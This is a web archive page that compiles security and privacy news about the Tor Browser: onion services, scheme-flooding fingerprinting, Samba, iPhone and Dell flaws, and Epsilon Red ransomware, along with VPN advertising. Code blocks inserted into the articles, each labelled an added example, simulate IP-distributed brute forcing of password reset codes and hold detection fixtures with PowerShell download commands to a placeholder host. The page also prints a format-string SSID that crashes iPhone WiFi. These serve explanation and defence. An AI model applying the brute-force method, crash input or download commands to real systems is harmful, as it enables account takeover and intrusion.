
Category Archives: Tor Browser

Pros and Cons of using Tor Browser – Get Expert Review …

Posted: July 27, 2021 at 1:12 pm

Before stepping into the explanation of the pros and cons of Tor, you need to know the importance of Tor and why it is used. Do you want to know the main purpose of using the Tor browser on your system? Then let me explain every nook and corner of Tor. What is Tor? Tor is a browser that aims to conceal its users' identities and their online activity from surveillance and traffic analysis by separating identification and routing.

Tor browser is an implementation of onion routing, which encrypts and then randomly bounces communications through a network of relays run by volunteers around the globe.

This is it. Now we can jump on to the topic.

Tor is a browser that lets you browse the internet anonymously. I guess you now have an idea about the Tor browser and its usage.

DOUBLE THE SECURITY: Tor browser is one layer of protection for your information. If you need a double layer of protection, then go ahead with a VPN. A powerful VPN can boost the anonymity, and no one in the universe can track your IP address, usernames, passwords or anything else.

But what are the advantages and disadvantages of using the Tor browser on your system? Take a look at the article below for more opinion.

First, let me tell you that this browser is available for free. You can use it completely without any worry. Secure your information by using Tor. It offers you a bunch of features. I have listed them below. Check it out.


Protection from hackers: How Tor is tightening security – DW (English)

Posted: June 28, 2021 at 10:08 pm

People who value a high level of privacy protection, or who depend on this protection for political reasons, can access websites using Tor without leaving any traces on the net. With a Tor browser, users' internet traffic is automatically routed through several Tor servers, which ensure anonymity through encryption. Only then does it go to the actual destination: the web server users intend to visit.

This process is called routing. Tor actually stands for "The Onion Routing" because the Tor servers layer their encryption on top of the encryption of other servers, reminiscent of onion layers.

Tor is secure by design. For this reason, there have hardly been any major security incidents to the detriment of users. Its browser, which is based on the Firefox browser, is continuously developed and secured by the free, open source Tor project.

Content providers who want to offer their content directly in the Tor network operate an "onion service." This is a web server that is directly connected to the Tor network. These websites can be recognized by the extension .onion and can only be accessed via the Tor browser.

Deutsche Welle has also been operating its own onion service for some time, making it easier for users all over the world to access free media anonymously, especially people who fear repression for using such free media. Tor can also be a useful tool for journalists, for example when they cannot conduct regular research because they are being persecuted by state actors and intelligence agencies. This is crucial because fear of surveillance alone can quickly lead to self-censorship.

Tor not only protects users' anonymity, but also offers them paths to free information in censored markets.

For example, authoritarian states often block content from international information providers such as DW, the BBC and The New York Times. With Tor, this state censorship can be circumvented. The previous web address of Deutsche Welle was: https://dwnewsvdyyiamwnp.onion.

But this is now changing.

As you can probably already tell from the long and difficult-to-read onion service addresses, cryptography is involved here. Tor does not have a central domain system which forwards readable web addresses like dw.com to the IP addresses of computers.

Address allocation is decentralized and consists of a cryptographic key. This makes it particularly secure. Part of this key is the onion service address.

Attackers can get hold of such a key by brute force. So far, they have mostly used these attacks to hack passwords.

The longer the key or password, the more computing power is required and the more difficult such an attack becomes.

It is precisely this massive computing power that is now available to some authoritarian regimes in the form of Bitcoin mining farms. In recent months, computing capacity has grown very quickly in countries such as China and Iran.

As a result, the Tor project has decided to only support addresses with a length of 56 characters and has adopted the "Onion v3 standard" for this purpose. Addresses in the new standard are considered secure for the next few years, not only because of their greater length, but also because of other modern cryptographic functions.

DW's new onion service address as of now is:

https://dwnewsgngmhlplxy6o2twtfgjnrnjxbegbwqx6wnotdhkzt562tszfid.onion

Because these v3 addresses are very difficult to read and remember, it is also sufficient to enter the publicly known address in the Tor browser, for example dw.com. The browser then offers to use the complicated Tor address once and automatically on future page requests.

But be careful: this procedure means that you briefly leave the secure Tor network, so users who need the highest level of anonymity should only use the long cryptographic v3 Tor address.

[Photo gallery: Iranian filmmakers and censorship (Rasoulof, Kahani, Ayari, Farhadi, Ghobadi, Satrapi, Makhmalbaf, Panahi, Neshat)]

Author: Elizabeth Grenier


Patch Tor Browser Bug to Prevent Tracking of Your Online Activities – The Hacker News

Posted: at 10:08 pm

Open-source Tor browser has been updated to version 10.0.18 with fixes for multiple issues, including a privacy-defeating bug that could be used to uniquely fingerprint users across different browsers based on the apps installed on a computer.

In addition to updating Tor to 0.4.5.9, the browser's Android version has been upgraded to Firefox 89.1.1, alongside incorporating patches rolled out by Mozilla for several security vulnerabilities addressed in Firefox 89.

Chief among the rectified issues is a new fingerprinting attack that came to light last month. Dubbed scheme flooding, the vulnerability enables a malicious website to leverage information about installed apps on the system to assign users a permanent unique identifier even when they switch browsers, use incognito mode, or a VPN.

Put differently, the weakness takes advantage of custom URL schemes in apps as an attack vector, allowing a bad actor to track a device's user between different browsers, including Chrome, Firefox, Microsoft Edge, Safari, and even Tor, effectively circumventing cross-browser anonymity protections on Windows, Linux, and macOS.

"A website exploiting the scheme flooding vulnerability could create a stable and unique identifier that can link those browsing identities together," FingerprintJS researcher Konstantin Darutkin said.

Currently, the attack checks a list of 24 installed applications that consists of Adobe, Battle.net, Discord, Epic Games, ExpressVPN, Facebook Messenger, Figma, Hotspot Shield, iTunes, Microsoft Word, NordVPN, Notion, Postman, Sketch, Skype, Slack, Spotify, Steam, TeamViewer, Telegram, Visual Studio Code, WhatsApp, Xcode, and Zoom.

The issue has serious implications for privacy as it could be exploited by adversaries to unmask Tor users by correlating their browsing activities as they switch to a non-anonymizing browser, such as Google Chrome. To counter the attack, Tor now sets "network.protocol-handler.external" to false so as to block the browser from probing installed apps.

Of the other three browsers, Google Chrome features a built-in safeguard against scheme flooding (it prevents launching any application unless it's triggered by a user gesture, like a mouse click), but the browser's PDF Viewer was found to bypass this mitigation.

"Until this vulnerability is fixed, the only way to have private browsing sessions not associated with your primary device is to use another device altogether," Darutkin said. Tor browser users are recommended to move quickly to apply the update to ensure they are protected.

The development arrives little over a week after encrypted messaging service Wire addressed two critical vulnerabilities in its iOS and web app that could lead to a denial-of-service (CVE-2021-32666) and permit an attacker to take control of a user account (CVE-2021-32683).


This Week In Security: Schemeflood, Modern Wardialing, And More! – Hackaday

Posted: at 10:08 pm

There's been yet another technique discovered to fingerprint users, and this one can even work in the Tor browser. Scheme flooding works by making calls to application URLs, something like steam://browsemedia. If your machine supports the requested custom URL, a pop-up is displayed, asking permission to launch the external application. That pop-up can be detected by JavaScript in the browser. Detect enough apps, and you can build a reasonable fingerprint of the system the test is run on. Unlike some previous fingerprinting techniques, this one isn't browser dependent; it will theoretically give the same results for any browser. This means even the Tor browser, or any browser being used over the Tor network, can give your potentially unique set of installed programs away.

Now for the good news. The Chrome devs are already working on this issue, and in fact, Chrome on my Linux desktop didn't respond to the probes in a useful way. Feel free to check out the demo, and see if the results are accurate. And as for Tor, you really should be running that on a dedicated system or in a VM if you really need to stay anonymous. And disable JavaScript if you don't want the Internet to run code on your computer.

Windows system security and Linux system security are quite different. OK, that's probably both something of an understatement, and pretty obvious. In a project like Samba, which re-implements the Server Message Block protocol, those differences are a constant challenge. Sometimes, like in the case of CVE-2021-20254, the results are unusual.

This story really begins at Linköping University, where [Peter Eriksson] discovered that someone was able to delete a file on a Samba share, when that should not have been possible. He apparently tracked down the problem, which is in the Samba code that maps Windows SIDs to Unix Group IDs. Samba caches these lookups, and a possible cached result is that a match cannot be found. The bug is triggered when that cached response is fetched again, reading past the end of the buffer. There isn't a known technique for triggering this bug intentionally, but that's likely a failure of imagination, so make sure you get this one patched.

There are odd machines still connected to the Plain Old Telephone System (POTS). This thought was apparently keeping [Valtteri Lehtinen] up at night, because he built a system to call 56,874 different phone numbers, and then documented what he found. His testing rig is a bit odd, using WarVOX as the dialer. That program only supports IAX2, a VoIP protocol introduced by the Asterisk project that has been mostly forgotten in favor of SIP. His interface to the outside world was a SIP-to-GSM gateway and a cheap prepaid SIM card. To make WarVOX talk to the SIP gateway, he stood up an Asterisk instance to do the translation. His target was the freephone numbers, similar to a 1-800 number in the States, mostly businesses rather than individuals.

He spent 60 seconds per call, and recorded the results, running the experiment for 40 days. His results? About 2% of the numbers were interesting. He categorized those, and came up with 74 unique systems he had reached. For an example of what that means, seven of his calls reached dedicated fax lines. These were indistinguishable from each other, so they only account for a single unique system. Eleven calls just played music, but several of those seemed to be playing the exact same music, making for seven unique systems.

There are a few really oddball recordings that [Valtteri] found. Two numbers contain a prompt about the zombie apocalypse, asking the caller if he wants to be rescued. These remind me very much of the various joke phone numbers, like the rejection hotline. He also found a couple numbers that sound very much like old mechanical phone switching hardware. Wouldn't it be interesting to know exactly what hardware is on the other end of those calls? We can't recommend taking up wardialing as a hobby, but there are certainly still some interesting endpoints out there. Want to look into the recordings for yourself? Check out his blog post, where many of the recordings are available to listen to.

There's a very odd problem with the iPhone that's attracted a lot of attention this week. Connecting to a WiFi network with a name like %p%s%s%s%s%n made the phone's WiFi subsystem crash, and prevented connection to any other networks. That string looks interesting, doesn't it? Almost like a format string. For those not following, most programming languages have string formatting functions that take a series of inputs, combined with a format string like this one, and plug the inputs into the string. C's printf() is one of the more familiar to many of us. The catch here is that when the inputs don't match what the string calls for, you enter the realm of undefined behavior, AKA crashes and vulnerabilities.

[CodeColorist] took a deeper look at the problem, and confirmed that it is indeed a format string issue. When the device attempts to connect to a new WiFi network, a message is written to the system log: "Attempting Apple80211AssociateAsync to" and then the network name, using a format string method. The process of writing the string to the log invokes another such method, but this time the SSID is now part of the format string. The inputs no longer match, leading to a crash of the WiFi process. While it's certainly an annoying bug, it doesn't appear to be one that can lead to RCE.

Password reset systems have always been something of a weak point of security schemes. Of particular note are the schemes that use a four- or six-digit reset code to protect the account. Have you ever wondered what stops an attacker from triggering a reset, and then simply trying all one million possible codes, assuming a six-digit number? The usual answer is a combination of expiring codes and rate limiting on guesses. This story is about Apple accounts, but the background is that [Laxman Muthiyah] first found a way to exploit the password reset function of Instagram.

Here's the setup. When you start the password reset process on Instagram, a six-digit code is emailed to the email address on file. If you have access to that email, you type in the code within ten minutes, proving that you're the account owner. After ten minutes, the code expires. If you're an attacker, you can start the password reset process, and then guess that six-digit code: again, one million possible values. Try to brute force the code, and about 200 attempts go through before the rate-limiting kicks in. That gives you a 1-in-5,000 chance of breaking into the account.

What if there was a way to get around the rate-limiting? Hint: There was. You see, trying to send more than 200 guesses from a single IP was easily detected and rate-limited. But what if you had two different IPs? Send 200 guesses from each, at the same time, and they all get processed with no rate limiting. So to take over an Instagram account, all it takes is 5,000 IPs that you can send traffic from for a few seconds. Now how would you get 5,000 IPs to use? Three options come to mind. The cloud, a botnet, or IPv6 addresses. He used a cloud to demonstrate the attack, covering 20% of the possible key space in a single go. He netted a cool $30,000 from turning in the findings to Facebook.

Would other providers have the same weakness? [Muthiyah] took a look at Apple's account recovery process, and found a way to pull off the same attack, but with some major limitations. Rather than 200 guesses from each IP, he could send six. That isn't enough for a viable attack, but the target URL endpoint exists on six different IPs. That gives an attacker 36 guesses from each IP he controls. That's on the edge of being exploitable, with only 28,000 IPs needed. That's a *small* botnet. Apple agreed, asking him to keep the attack under his hat until they could push out fixes.
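The defensive point in the Instagram and Apple stories above is that a limit counted per source IP is defeated by spreading the same guess stream over many IPs, while a limit counted per issued code is not. The following is an added example (not Instagram's, Apple's or the column author's code): a hypothetical reset-code store whose ten-minute expiry and 200-guesses-per-IP window follow the article, and whose per-code cap of five attempts is an assumed defender-chosen value; the IP-only policy is reproduced by passing `per_code_limit=None`.

```python
"""Reset-code verification that caps attempts per code instead of per source IP.

Added example, not Instagram's, Apple's or the column's own code. The ten-minute
expiry and the 200-guesses-per-IP window follow the article; the per-code cap of
five attempts and all names below are assumptions.
"""
import secrets
import time
from dataclasses import dataclass

CODE_TTL_SECONDS = 600   # the article's ten-minute expiry
PER_IP_LIMIT = 200       # the only control in the vulnerable design
PER_CODE_LIMIT = 5       # assumed defender-chosen cap, counted per issued code


@dataclass
class ResetCode:
    code: str
    issued_at: float
    attempts: int = 0


class ResetCodeStore:
    """In-memory store; per_code_limit=None reproduces the IP-only policy."""

    def __init__(self, per_code_limit=PER_CODE_LIMIT, clock=time.monotonic):
        self.per_code_limit = per_code_limit
        self.clock = clock
        self.codes = {}       # account -> ResetCode
        self.ip_counts = {}   # source ip -> guesses seen from it

    def issue(self, account, code=None):
        """Issue a fresh six-digit code; `code` is injectable only for tests."""
        if code is None:
            code = f"{secrets.randbelow(1_000_000):06d}"
        self.codes[account] = ResetCode(code, self.clock())
        return code

    def verify(self, account, guess, source_ip):
        # Per-IP limiter: useful against a single noisy client, bypassable by many.
        n = self.ip_counts.get(source_ip, 0) + 1
        self.ip_counts[source_ip] = n
        if n > PER_IP_LIMIT:
            return "rate_limited_ip"
        entry = self.codes.get(account)
        if entry is None:
            return "no_code"
        if self.clock() - entry.issued_at > CODE_TTL_SECONDS:
            del self.codes[account]
            return "expired"
        # Per-code limiter: the attacker's IP count is irrelevant to this check.
        if self.per_code_limit is not None and entry.attempts >= self.per_code_limit:
            del self.codes[account]   # burn the code; the user must request a new one
            return "locked"
        entry.attempts += 1
        if secrets.compare_digest(entry.code, guess):
            del self.codes[account]   # single use
            return "ok"
        return "invalid"


def distributed_guessing(store, account, ips, guesses_per_ip):
    """Replay the article's bypass: one guess stream spread over many IPs,
    `guesses_per_ip` from each. Returns how many guesses were actually compared
    against the code, i.e. how much of the key space the attacker covered."""
    compared = 0
    guess = 0
    for ip in ips:
        for _ in range(guesses_per_ip):
            result = store.verify(account, f"{guess:06d}", ip)
            guess += 1
            if result in ("ok", "invalid"):
                compared += 1
    return compared


if __name__ == "__main__":
    ips = [f"203.0.113.{i}" for i in range(50)]   # constructed attacker addresses
    for limit in (None, PER_CODE_LIMIT):
        store = ResetCodeStore(per_code_limit=limit)
        store.issue("alice", code="987654")        # constructed test code
        covered = distributed_guessing(store, "alice", ips, PER_IP_LIMIT)
        print(f"per_code_limit={limit}: {covered} guesses reached the comparison")
```

With the IP-only policy all 10,000 guesses from 50 IPs are compared; with the per-code cap only five are, after which the code is burned and the attacker has to wait for the legitimate user to request a new one.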

The story gets weird from here. First, what should have been a relatively simple fix took about ten months to roll out. [Laxman] asked for an update, and was told that his attack only worked against accounts not tied to a hardware device. Accounts tied to a device use a bit different password reset method, where a hashing function is used to prove that the user knows the reset code. That URL endpoint is now very well protected against his parallel brute-force attack, but he was only able to test it after the flaw was fixed.

For his trouble, Apple offered him $18,000. Sounds great, right? Hold up. A vulnerability that leads to an Apple account takeover should be worth $100,000; and if that leads to data extraction from a device, it goes up to $250,000. [Laxman] openly speculates that his attack probably worked on all accounts before it was patched, and suspects Apple of pulling a fast one. He walked away from the offered bounty, and posted the entire story for everyone to see. This isn't the first time we've covered disputes over bug bounties, and I'm sure it won't be the last.

Eclypsium found a handful of problems with Dell's firmware update process. BIOSConnect is a firmware update process that runs entirely from the system BIOS. From what I can tell, this means that a Dell machine could be vulnerable even if it isn't running Dell's SupportAssist, or even Windows at all. The BIOS makes an HTTPS request to downloads.dell.com, but fails to properly validate the TLS certificate. It seems that any wildcard certificate for any domain will be accepted. You could fool it as easily as using a Let's Encrypt certificate for *.myuniquedomain.com, and telling an HTTPS server to use that cert for dell.com.

The saving grace here is that an attacker needs to be on the same network as the victim machine, in order to MitM the connection to the update server. Either way, if you have Dell hardware, go check for this issue and update if it's there, or at least turn off BIOSConnect.
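The check BIOSConnect got wrong is the hostname-identity comparison that every TLS client must do after chain validation: a wildcard name is only valid for hosts whose remaining labels match it exactly. The following is an added example (not Dell's or Eclypsium's code) implementing that comparison over certificates represented as constructed dicts in the shape Python's `ssl.getpeercert()` returns; `wildcard_only_check` mirrors the "any wildcard is accepted" failure mode the article describes, purely as the contrast.

```python
"""Certificate hostname matching done the way BIOSConnect, as described above, did not.

Added example (not Dell's or Eclypsium's code). The certificates below are constructed
dicts in the shape Python's ssl.getpeercert() returns; no network connection is made.
"""


def hostname_matches(pattern: str, hostname: str) -> bool:
    """True if certificate DNS identity `pattern` is valid for `hostname`.

    Follows the usual RFC 6125 restrictions: a wildcard must be the entire
    leftmost label, it matches exactly one label, and it must not cover a
    public suffix such as "*.com". Everything right of the wildcard must match.
    """
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels = pattern.split(".")
    h_labels = hostname.split(".")
    if p_labels[0] != "*" or any("*" in label for label in p_labels[1:]):
        return False          # wildcard only as the whole leftmost label
    if len(p_labels) < 3:
        return False          # "*.com" would match every .com host
    if len(h_labels) != len(p_labels):
        return False          # "*.dell.com" covers "a.dell.com", not "a.b.dell.com"
    return p_labels[1:] == h_labels[1:]


def cert_identities(cert: dict) -> list:
    """DNS names the certificate claims: subjectAltName dNSName entries, with the
    subject commonName used only when no SAN is present (legacy behaviour)."""
    names = [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]
    if names:
        return names
    for rdn in cert.get("subject", ()):
        for key, value in rdn:
            if key == "commonName":
                names.append(value)
    return names


def cert_valid_for(cert: dict, hostname: str) -> bool:
    """The check a client must do after chain validation: does any identity in
    the certificate match the host it meant to talk to?"""
    return any(hostname_matches(name, hostname) for name in cert_identities(cert))


def wildcard_only_check(cert: dict) -> bool:
    """Mirrors the failure mode the article reports: accepting any wildcard
    identity without comparing it to the expected hostname. Contrast only."""
    return any(name.startswith("*.") for name in cert_identities(cert))


# Constructed sample certificates, not real Dell or Let's Encrypt certificates.
ATTACKER_CERT = {
    "subject": ((("commonName", "*.myuniquedomain.com"),),),
    "subjectAltName": (("DNS", "*.myuniquedomain.com"), ("DNS", "myuniquedomain.com")),
}
LEGITIMATE_CERT = {
    "subject": ((("commonName", "downloads.dell.com"),),),
    "subjectAltName": (("DNS", "downloads.dell.com"), ("DNS", "*.dell.com")),
}

if __name__ == "__main__":
    host = "downloads.dell.com"
    print("broken check accepts attacker cert:", wildcard_only_check(ATTACKER_CERT))
    print("proper check accepts attacker cert:", cert_valid_for(ATTACKER_CERT, host))
    print("proper check accepts legitimate cert:", cert_valid_for(LEGITIMATE_CERT, host))
```

In a real client this comparison is what `ssl.SSLContext.check_hostname` (or the equivalent in any TLS library) performs; the example only makes the rule visible.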

There's been a rash of ransomware attacks against consumer NAS devices, and it looks like Western Digital's My Book Live might be the next device to be hit. Multiple users discovered their drives wiped on the 23rd, and a log note that a factory restore had been triggered. WD has released a statement, acknowledging the issue, and recommending that anyone with a My Book Live unplug it from the network right away, and leave it offline until they can get to the bottom of the issue. The latest official news is a reference to a 2018 CVE, a pre-auth network RCE. What immediately comes to mind is that a particularly obnoxious ransomware program could include this attack as part of an effort to destroy backups. The odd part is that none of the affected users have reported a ransomware note.

Microsoft announced Windows 11, and while there was the normal marketing hype and keynotes, there were a couple interesting security-related tidbits, mostly in the updated system requirements. First up is the Trusted Platform Module 2.0 requirement. Most modern motherboards ship with a firmware TPM, but often disabled by default. If you try running the upgrade check, and were told that your nearly-new system can't run Windows 11, that's probably why. But why would Microsoft require a TPM for everyone? Credit to Robert Graham for this one: TPM is a requirement for BitLocker, the high quality whole disk encryption software built into Windows. This would indicate that BitLocker is going to be on for everyone, rather than a feature you have to manually enable.

The other somewhat surprising change is that Microsoft is doing away with support for 32-bit processors, and going to 64-bit Windows only. There are sure to be some issues for people still running 16-bit code, which wont execute at all under 64-bit Windows. There are, however, quite a few security features that only run on 64-bit windows, like ASLR, signed drivers, the NX bit for Data Execution Protection, and PatchGuard. While the reduced engineering burden of dropping 32-bit Windows was likely the major driver in this decision, the Windows platform will be significantly more secure as a result.


Why You Missed the "Friends: The Reunion" – Programming Insider

Posted: June 4, 2021 at 3:37 pm


On May 27, die-hard fans worldwide watched the cast of Friends revisit Stage 24 at the Warner Bros. Studios, reminisce about their time spent at Central Perk, and re-enact their favorite scenes. But a lot of fans were unable to see their beloved characters reunite once again. Instead, they were greeted by a Not in Service Area message on HBO Max. Is there anything you can do? Actually, there is. You only need a VPN to be able to enjoy The One Where They Get Back Together.


Why some online content is not available to you

Streaming platforms like Netflix, Sky, or HBO Max are often not available in certain areas, or they offer different content in different countries. There are a few reasons behind this:

Because of all of this, popular streaming platforms set geo-restrictions. That's the reason why you missed the Friends reunion, why Spotify is not available in Venezuela, and why Netflix users in Europe can't watch Maleficent.

Watch the Friends reunion episode wherever you are

What are geo-restrictions? They work by granting access to the website only to users with certain IP addresses. For example, the HBO Max homepage will look very different to someone with an American IP address and someone with a Swedish IP address.

Luckily, there are ways you can hide your IP and get a new one. The fastest and easiest way is to subscribe to a reliable VPN service, like NordVPN. With it, you can change your IP in a second; one click is all it takes.

Proxies or the Tor browser can also change your IP, but they are often unstable and prone to IP and DNS leaks, and therefore unreliable. NordVPN offers a stable connection, thousands of servers to choose from, the fastest VPN speeds on the market, and bulletproof encryption. Once you're connected to one of their servers in the US, you'll get an American IP, and to every online service you will appear to be browsing from the USA.

With geo-restrictions gone, you can stream movies and TV shows like a local. It works the same way in every country you connect to. This could also result in better prices: some popular products and subscriptions are cheaper in certain parts of the world. If you want to save a few bucks, make sure to investigate different markets.

Won't a VPN slow me down?

It's a widely known fact that browsing with a VPN is significantly slower than without one. And, if you're looking to stream video content, you don't want that buffering icon to show up every two minutes.

Luckily, you won't have this problem with NordVPN. They have recently introduced a new VPN protocol called NordLynx. It combines both speed and security like no other VPN protocol ever could. With it, you'll never have to worry about buffering again. Once you enable NordLynx, you'll be able to connect to a remote server in a literal second and then hardly even notice the difference when browsing, gaming, or streaming.

Another thing worth noting is that connecting to NordVPN could even make your connection faster. If your ISP decides to limit your internet speed specifically for streaming, a VPN will help. Once you connect to a remote server, your ISP no longer sees what you do online, so they can't throttle internet speed for specific traffic, like streaming or gaming.

Use streaming services anywhere in the world

Want to watch Netflix, HBO Max, and Hulu without restrictions? It's easy:

Keep in mind that streaming platforms sometimes block IPs of known VPN servers, so you might need to try a few different servers until you find one that works. If you have any trouble setting up your app or connecting to a streaming service, you can always contact NordVPNs support team. They are available online 24/7 and will happily solve any problems you might have.


New ransomware Epsilon Red discovered – how it works – SecurityBrief New Zealand

Posted: at 3:37 pm

New ransomware Epsilon Red has been found by Sophos researchers who detail the tools, techniques, procedures, and behaviour of the attackers behind it.

Sophos' researchers have discovered the Epsilon Red ransomware is delivered as the final executable payload in a manually orchestrated attack. And according to their analysis, every other component of the attack relies on PowerShell scripts.

The PowerShell scripts include:

Sophos says the ransom note left behind on the infected computers resembles that left by REvil ransomware, although the Epsilon Red operators appear to have made a few grammatical language corrections.

The attackers encourage victims to engage with them via a website. Based on the cryptocurrency address provided by the attackers, it would seem at least one of Epsilon Red's victims paid a ransom of 4.29 BTC (around US$210,000).

"Epsilon Red is an intriguing new ransomware," says Sophos Rapid Response manager, Peter Mackenzie.

"The actual ransomware file itself is very pared down, probably because it has offloaded other tasks, such as deleting backups, to the PowerShell scripts. It is really only used for file encryption, and it doesn't precision-target assets. If it decides to encrypt a folder, it will encrypt everything inside that folder.

"Unfortunately, this can mean other executables and dynamic link libraries (DLLs) are also encrypted, which can disable key running programs or the entire system. As a result, the attacked machine will need to be completely rebuilt," he says.

The Sophos analysis of the attackers behaviour could suggest they lack confidence in the reliability of their tools or the potential success of their attack, so they include alternative options and backup plans in case things fail.

"Early on in the attack sequence the operators download and install a copy of Remote Utilities and the Tor Browser, possibly to ensure an alternate foothold if the initial access point gets locked down," says Sophos.

"In other cases we see the operators issue redundant commands that use a slightly different method to accomplish the same goal, such as deleting processes and backups. The best way to prevent ransomware such as Epsilon Red is to ensure servers are fully patched and that security solutions can detect and block any suspicious behaviour and attempted file encryption."

The rest is here:
New ransomware Epsilon Red discovered - how it works - SecurityBrief New Zealand


Sophos claims to have found new barebones Windows ransomware – iTWire

Posted: at 3:37 pm

Global security vendor Sophos claims to have discovered a new strain of Windows ransomware which is the final executable payload in a manual attack where every other stage is delivered through a PowerShell script. One of the entry points was an on-premise Microsoft Exchange Server installation.

In a detailed blog post, Sophos principal researcher Andrew Brandt said the new strain, named Epsilon Red, was written in the Go programming language and had been observed in operation against an American hospitality business recently. The name Epsilon Red comes from the X-Men series, and is a relatively obscure adversary of some of the X-Men in the Marvel extended universe.

A ransom of about 4.29 bitcoin was paid by at least one attacked entity, Brandt wrote, adding that this was based on tracking the bitcoin wallet which was listed by the attackers for payment.

"It appears that an enterprise Microsoft Exchange server was the initial point of entry by the attackers into the enterprise network," he wrote.

The ransom note left by Epsilon Red. Courtesy Sophos

"From that machine, the attackers used WMI to install other software onto machines inside the network that they could reach from the Exchange server."

The PowerShell scripts were numbered from 1 to 12 and the final executable was named Red.exe.

"Strangely enough, the ransom note closely resembles the note used by REvil, a much more widely used ransomware," Brandt wrote.

"But where the REvil note is typically riddled with spelling and grammatical errors, the note delivered by Epsilon Red has gone through a few edits to make its text more readable to an audience of native English speakers."

Apart from Brandt, Anand Ajjan, Richard Cohen, Fraser Howard, Elida Leite, Mark Loman, Andrew Ludgate, Peter Mackenzie, Nirav Parekh, and Gabor Szappanos also contributed to the blog post.

Mackenzie, manager of the Sophos Rapid Response team, said: "Epsilon Red is an intriguing new ransomware. The actual ransomware file itself is very pared down, probably because it has offloaded other tasks, such as deleting back-ups, to the PowerShell scripts.

"It is really only used for file encryption and it doesn't precision-target assets: if it decides to encrypt a folder, it will encrypt everything inside that folder. Unfortunately, this can mean other executables and dynamic link libraries are also encrypted, which can disable key running programs or the entire system. As a result the attacked machine will need to be completely rebuilt.

"Sophos' analysis of the attackers' behaviour suggests they may lack confidence in the reliability of their tools or the potential success of their attack, so they implement alternative options and back-up plans in case things fail.

"For instance, early on in the attack sequence the operators download and install a copy of Remote Utilities and the Tor Browser, possibly to ensure an alternate foothold if the initial access point gets locked down.

"In other cases we see the operators issue redundant commands that use a slightly different method to accomplish the same goal, such as deleting processes and backups. The best way to prevent ransomware such as Epsilon Red from taking hold is to ensure servers are fully patched and that your security solution can detect and block any suspicious behaviour and attempted file encryption."
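The staging pattern both Sophos write-ups above describe (numbered PowerShell scripts, PowerShell launched through WMI, Remote Utilities and Tor Browser fetched as a fallback foothold, and Red.exe as the final payload) can be turned into a per-host hunting rule. This is an added detection example, not Sophos' code: the events are constructed Sysmon-style process-creation records, and the field layout, weights and `example.invalid` URLs are this example's own assumptions.

```python
"""Hunt for the Epsilon Red staging pattern described above.  Added example,
not Sophos' code: the events are constructed Sysmon-style process-creation
records and the weights and example.invalid URLs are this example's own."""
import re
from collections import defaultdict

# Constructed sample events: (host, parent image, image, command line)
EVENTS = [
    ("EXCH01", "w3wp.exe", "powershell.exe", r"powershell -ep bypass -f C:\Temp\1.ps1"),
    ("FS01", "WmiPrvSE.exe", "powershell.exe", r"powershell -ep bypass -f C:\Temp\2.ps1"),
    ("FS01", "WmiPrvSE.exe", "powershell.exe", r"powershell -ep bypass -f C:\Temp\3.ps1"),
    ("FS01", "powershell.exe", "powershell.exe",
     "powershell iwr https://example.invalid/remote-utilities.exe -OutFile ru.exe"),
    ("FS01", "powershell.exe", "powershell.exe",
     "powershell iwr https://example.invalid/torbrowser-install.exe -OutFile tb.exe"),
    ("FS01", "powershell.exe", "Red.exe", r"C:\Temp\Red.exe"),
    ("WS22", "explorer.exe", "powershell.exe", r"powershell -f C:\Scripts\backup.ps1"),
]

STAGE_RE = re.compile(r"[\\/](\d{1,2})\.ps1\b", re.IGNORECASE)  # 1.ps1 .. 12.ps1
TOOL_RE = re.compile(r"remote.?utilities|tor.?browser", re.IGNORECASE)


def analyze(events):
    """Correlate events per host; return {host: {score, severity, reasons}}."""
    per_host = defaultdict(lambda: {"stages": set(), "wmi": 0,
                                    "tools": set(), "payload": False})
    for host, parent, image, cmdline in events:
        h = per_host[host]
        m = STAGE_RE.search(cmdline)
        if m:
            h["stages"].add(int(m.group(1)))
        # Remote WMI process creation appears as a child of WmiPrvSE.exe
        if parent.lower() == "wmiprvse.exe" and image.lower() == "powershell.exe":
            h["wmi"] += 1
        for tool in TOOL_RE.findall(cmdline):
            h["tools"].add(re.sub(r"[^a-z]", "", tool.lower()))
        if image.lower() == "red.exe":
            h["payload"] = True
    findings = {}
    for host, h in per_host.items():
        reasons, score = [], 0
        if h["stages"]:
            reasons.append(f"numbered PowerShell stages {sorted(h['stages'])}")
            score += 2 if len(h["stages"]) > 1 else 1
        if h["wmi"]:
            reasons.append(f"{h['wmi']} PowerShell launches under WmiPrvSE.exe")
            score += 2
        if h["tools"]:
            reasons.append("alternate-foothold tools fetched: " + ", ".join(sorted(h["tools"])))
            score += 2
        if h["payload"]:
            reasons.append("Red.exe executed: final ransomware payload")
            score += 5
        if score:
            severity = "critical" if score >= 5 else "suspicious" if score >= 3 else "low"
            findings[host] = {"score": score, "severity": severity, "reasons": reasons}
    return findings
```

Feeding the constructed events through `analyze` flags FS01 as critical on every signal and EXCH01 as low on a single staged script, while the ordinary admin script on WS22 is not reported.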


Vulnerability in popular browsers could be used to track, profile users online – Help Net Security – Help Net Security

Posted: May 20, 2021 at 4:49 am

A vulnerability affecting desktop versions of four popular web browsers could be exploited by advertisers, malicious actors, and other third parties to track and profile users online even if they switch browsers, use incognito mode or a VPN, researcher and developer Konstantin Darutkin claims.

Darutkin and his colleagues from FingerprintJS are calling the vulnerability and its exploitation "scheme flooding", as attackers (i.e., websites) can use browsers' built-in custom URL scheme handlers to check if site visitors have 32 different applications installed on their desktops.

"You can see this feature in action by entering skype:// in your browser address bar. If you have Skype installed, your browser will open a confirmation dialog that asks if you want to launch it," he explained.

Websites, such as their own live demo site, can flood the user with URL scheme requests for detecting the presence of widely used apps such as Spotify, Zoom, Slack, Telegram, Discord, Steam, Xcode, Microsoft Word, NordVPN, Hotspot Shield, and others and cancel those requests as soon as an app is detected as present or absent.

The information gathered from these requests can be used to create a permanent unique identifier that can link browsing identities together.

"The scheme flood vulnerability allows for targeted advertisement and user profiling without user consent. The list of installed applications on your device can reveal a lot about your occupation, habits, and age. For example, if a Python IDE or a PostgreSQL server is installed on your computer, you are very likely to be a backend developer," Darutkin explained.

Or, for example, if the user has game clients installed, advertisers can push ads related to online games.

"Depending on the apps installed on a device, it may be possible for a website to identify individuals for more sinister purposes. For example, a site may be able to detect a government or military official on the internet based on their installed apps and associate browsing history that is intended to be anonymous," he also pointed out.

FingerprintJS researchers tested Chrome, Firefox, Safari and the Tor Browser and found them to be vulnerable to this type of attack despite implemented safety mechanisms.

